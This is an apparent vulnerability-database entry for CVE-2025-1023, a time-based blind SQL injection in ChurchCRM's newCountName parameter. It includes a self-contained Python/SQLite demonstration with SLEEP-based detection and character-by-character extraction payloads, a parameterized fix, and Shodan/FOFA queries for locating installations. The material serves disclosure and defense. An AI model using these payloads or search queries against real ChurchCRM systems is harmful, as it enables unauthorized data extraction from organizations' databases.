CVE-2025-1023

Tags: CRITICAL, EXPLOITED, NUCLEI

ChurchCRM <5.13.0 - SQL Injection


Description

ChurchCRM 5.13.0 and prior contain a time-based blind SQL injection in the EditEventTypes functionality. The newCountName parameter is concatenated directly into an SQL query without parameterization or sanitization, so an attacker who controls that parameter can alter the query and execute arbitrary SQL statements, potentially leading to data exfiltration, modification, or deletion. Because the injection is blind, the attacker infers query results from response timing (for example, by injecting a SLEEP() call) rather than from the page content.
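As an added illustration, and not ChurchCRM's code, the linked PoC, or the Nuclei template: a constructed Python/SQLite model of the defect the description names. The table and column names and the query shape are assumptions for the example only; SQLite has no SLEEP(), so the example registers one to mimic MySQL's. It shows the concatenated query beside its parameterized form, the timing oracle a scanner uses to confirm a time-based blind injection, and how that oracle becomes character-by-character extraction.

```python
import sqlite3
import time

# Constructed stand-in for the database: one table holding a value an
# attacker might want to read. Table and column names are invented for this
# example and are not ChurchCRM's schema.
def make_db():
    conn = sqlite3.connect(":memory:")
    # SQLite has no SLEEP(); register one so MySQL-style time-based payloads
    # behave the same way here (assumption: the real target runs MySQL).
    conn.create_function("SLEEP", 1, lambda s: (time.sleep(s), 0)[1])
    conn.execute(
        "CREATE TABLE event_count (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)"
    )
    conn.execute("INSERT INTO event_count (name, secret) VALUES ('Adults', 'S3CR3T')")
    conn.commit()
    return conn

def vulnerable_lookup(conn, new_count_name):
    """CWE-89: the request parameter is concatenated into the statement text."""
    sql = "SELECT id FROM event_count WHERE name = '" + new_count_name + "'"
    return conn.execute(sql).fetchall()

def safe_lookup(conn, new_count_name):
    """Same query with a bound parameter: the value never becomes SQL."""
    return conn.execute(
        "SELECT id FROM event_count WHERE name = ?", (new_count_name,)
    ).fetchall()

def timed(fn, *args):
    """Run fn and return (result, seconds). An SQL error counts as result None."""
    start = time.perf_counter()
    try:
        result = fn(*args)
    except sqlite3.Error:
        result = None
    return result, time.perf_counter() - start

def sleeps_on_payload(conn, lookup, delay=0.2):
    """Detection oracle: does an injected SLEEP(delay) measurably stall the query?"""
    payload = f"Adults' AND SLEEP({delay}) AND '1'='1"
    _, elapsed = timed(lookup, conn, payload)
    return elapsed >= delay * 0.8

def extract_secret(conn, lookup, length, delay=0.05,
                   charset="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"):
    """Time-based blind extraction: one guess per character, delay means 'hit'."""
    recovered = ""
    for pos in range(1, length + 1):  # substr() is 1-based
        for ch in charset:
            payload = (
                "Adults' AND CASE WHEN substr((SELECT secret FROM event_count LIMIT 1),"
                f"{pos},1)='{ch}' THEN SLEEP({delay}) ELSE 0 END AND '1'='1"
            )
            _, elapsed = timed(lookup, conn, payload)
            if elapsed >= delay * 0.8:
                recovered += ch
                break
        else:
            return recovered  # no guess stalled the query: nothing to read
    return recovered

if __name__ == "__main__":
    db = make_db()
    print("vulnerable stalls on SLEEP payload:", sleeps_on_payload(db, vulnerable_lookup))
    print("parameterized stalls:              ", sleeps_on_payload(db, safe_lookup))
    print("leaked prefix via vulnerable query:", extract_secret(db, vulnerable_lookup, 2))
    print("leaked prefix via parameterized:   ", extract_secret(db, safe_lookup, 2))
```

The oracle in sleeps_on_payload is the same idea a Nuclei time-based template applies over HTTP: send the parameter once with a SLEEP() inside a closed-quote context and compare the response time against the unmodified request. The parameterized form returns no rows for the same input and never stalls, because the payload is compared as a string rather than compiled as SQL.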

Exploits (1)

GitHub · working PoC · 4 stars · by halilkirazkaya (poc)
https://github.com/halilkirazkaya/cve-poc-garage/tree/main/2025/CVE-2025-1023.md

Nuclei Templates (1)

ChurchCRM - SQL Injection
CRITICAL · VERIFIED · by Kazgangap
Shodan: http.title:"churchcrm"
FOFA: app="churchcrm"

Scores

CVSS v3 9.8
EPSS 0.0275
EPSS Percentile 86.0%
Attack Vector NETWORK
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details

VulnCheck KEV 2026-02-01
CWE
CWE-89
Status published
Products (1)
churchcrm/churchcrm < 5.13.0
Published Feb 18, 2025
Tracked Since Feb 18, 2026